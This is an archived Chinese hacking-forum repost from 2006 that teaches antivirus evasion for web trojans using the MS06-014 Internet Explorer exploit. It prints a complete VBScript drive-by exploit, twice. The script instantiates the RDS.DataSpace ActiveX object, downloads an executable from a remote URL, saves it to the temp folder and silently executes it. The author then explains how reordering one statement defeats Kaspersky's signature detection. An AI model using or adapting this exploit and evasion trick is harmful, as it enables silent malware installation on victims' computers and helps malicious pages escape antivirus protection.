‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]题(以ms06014谈网马免杀方法)

matin

版主

Rank: 7Rank: 7Rank: 7

该用户被禁止发言

元老勋章 帅哥勋章 正式版主勋章 超级版主勋章 优秀版主勋章

1# 发表于 2006-7-29 02:02  只看该作者

[转载]题(以ms06014谈网马免杀方法)

主题:以ms06014谈网马免杀方法
  作者: Goldsun[at]84823714
      -= 转载请说明来自火狐基地,否则以后将会没有东西公开发布出来=-
    网马免杀方法一般两种办法,一种是加密(微软自己的encode或者自己写加解密函数效果更好),另一种也是找特征码(字符或顺序)。
  有朋友说网马被喀吧杀,不知道所措,现我以ms06014为例,以传小技。
  原来的代码:
QUOTE:

CODE:

<html>
<script language="VBScript">
  on error resume next
  dl = "http://www.baidu.com/go.exe"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>
  <head>
  <title>Oh,my god!</title>
  </head><body>
  <center>You DO it!</center>
  </body></html>

[Copy to clipboard]



免杀后:
QUOTE:

CODE:

<html>
<script language="VBScript">
  on error resume next
  dl = "http://www.baidu.com/go.exe"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  S.open
  fname1= F.BuildPath(tmp,fname1)
  
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>
  <head>
  <title>Oh,my god!</title>
  </head><body>
  <center>You DO it!</center>
  </body></html>
[Copy to clipboard]




  大家注意观察,其实我就是将S.open语句移动到fname1= F.BuildPath(tmp,fname1)语句之前就实现了免杀,这正是挫败了喀吧的文件流特征码检测技术。
当然,在移动语句的时候,有必要注意语句在代码里的功能,不然会出错的。

遥远的思念

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题